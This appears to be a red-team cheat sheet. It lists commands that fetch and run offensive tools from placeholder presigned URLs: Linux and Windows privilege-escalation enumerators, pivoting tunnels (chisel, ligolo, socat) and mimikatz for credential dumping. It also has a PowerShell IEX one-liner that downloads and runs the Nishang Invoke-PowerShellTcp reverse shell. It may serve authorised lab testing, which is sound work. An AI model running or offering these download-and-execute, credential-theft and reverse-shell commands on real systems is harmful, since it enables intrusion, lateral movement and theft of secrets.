==============================
LINUX ENUMERATION
==============================

curl -fsSL "<PRESIGNED_URL_TO_l/linpeas.sh>" -o linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

curl -fsSL "<PRESIGNED_URL_TO_l/linenum.sh>" -o linenum.sh
chmod +x linenum.sh
./linenum.sh

curl -fsSL "<PRESIGNED_URL_TO_l/linux-exploit-suggester.sh>" -o linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

curl -fsSL "<PRESIGNED_URL_TO_l/pspy64>" -o pspy64
chmod +x pspy64
./pspy64


==============================
PIVOTING
==============================

curl -fsSL "<PRESIGNED_URL_TO_p/chisel>" -o chisel
chmod +x chisel

curl -fsSL "<PRESIGNED_URL_TO_p/ligolo-agent>" -o ligolo-agent
chmod +x ligolo-agent

curl -fsSL "<PRESIGNED_URL_TO_p/socat>" -o socat
chmod +x socat


==============================
WINDOWS ENUMERATION
==============================

powershell iwr "<PRESIGNED_URL_TO_w/winpeas.exe>" -OutFile winpeas.exe

powershell iwr "<PRESIGNED_URL_TO_w/seatbelt.exe>" -OutFile seatbelt.exe

powershell iwr "<PRESIGNED_URL_TO_w/sharpup.exe>" -OutFile sharpup.exe


==============================
CREDENTIAL ACCESS
==============================

powershell iwr "<PRESIGNED_URL_TO_c/mimikatz.exe>" -OutFile mimikatz.exe


==============================
NISHANG
==============================

powershell IEX (New-Object Net.WebClient).DownloadString("<PRESIGNED_URL_TO_tools/windows/nishang/Shells/Invoke-PowerShellTcp.ps1>")

==============================
NOTES
==============================

This file intentionally uses presigned URL placeholders.
Generate a short-lived URL list (15 minutes) from `docs/s3_inventory.txt` using:

  scripts/presign_from_inventory.sh --bucket redteam-lab-payloads
